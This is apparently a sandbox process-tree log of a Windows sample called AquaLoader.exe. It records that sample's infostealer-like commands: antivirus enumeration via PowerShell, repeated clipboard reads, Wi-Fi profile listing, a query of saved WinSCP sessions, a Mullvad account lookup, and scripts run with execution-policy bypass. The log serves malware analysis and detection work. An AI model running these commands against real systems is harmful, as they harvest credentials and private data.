- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6104
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6000
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7020
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6312
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8184
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6960
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8172
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7668
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6992
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6728
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6328
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6508
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8164
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6772
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8128
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7348
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7048
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7536
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\9NrHhOb61p7i.vbs"
    3⤵
    PID:7936
  - - C:\Windows\system32\cscript.exe
      cscript C:\Users\Admin\AppData\Roaming\9NrHhOb61p7i.vbs
      4⤵
      PID:5312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
    3⤵
    PID:7564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
    3⤵
    PID:6768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "function Get-AntiVirusProduct {
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7816
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
    3⤵
    PID:6548
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:6660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:7440
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:7520
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutRVd2O.ps1" -RunAsAdministrator"
    3⤵
    PID:7860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutRVd2O.ps1" -RunAsAdministrator
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:1172
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7940
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2884
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:3300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:8004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6344
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5268
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7468
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5860
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:3288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5500
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:4196
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:2140
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:8056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:6280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:5672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:7120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7492
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:7276
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5392

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\7f5894b4d2764851bad66a86a18d3803 /t 5856 /p 3544
1⤵
PID:6888

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SendNotifyMessage
PID:2776

C:\Users\Admin\AppData\Local\Temp\Temp1_AquaLoader.zip\AquaLoader.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_AquaLoader.zip\AquaLoader.exe"
1⤵
- Loads dropped DLL
PID:3760
- C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
  C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - Checks processor information in registry
  PID:5116
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6304
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\birthrates" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1768 --field-trial-handle=1780,i,16785894298309784352,10159218612497483505,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Loads dropped DLL
    PID:7432
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\AquaLoader.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\birthrates" --mojo-platform-channel-handle=1880 --field-trial-handle=1780,i,16785894298309784352,10159218612497483505,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Loads dropped DLL
    PID:4972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3760 get ExecutablePath"
    3⤵
    PID:4488
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=3760 get ExecutablePath
      4⤵
      PID:6892
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7208
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7908
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5688
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5700
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4788
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6308
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6060
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5472
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3048
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7980
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5108
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6872
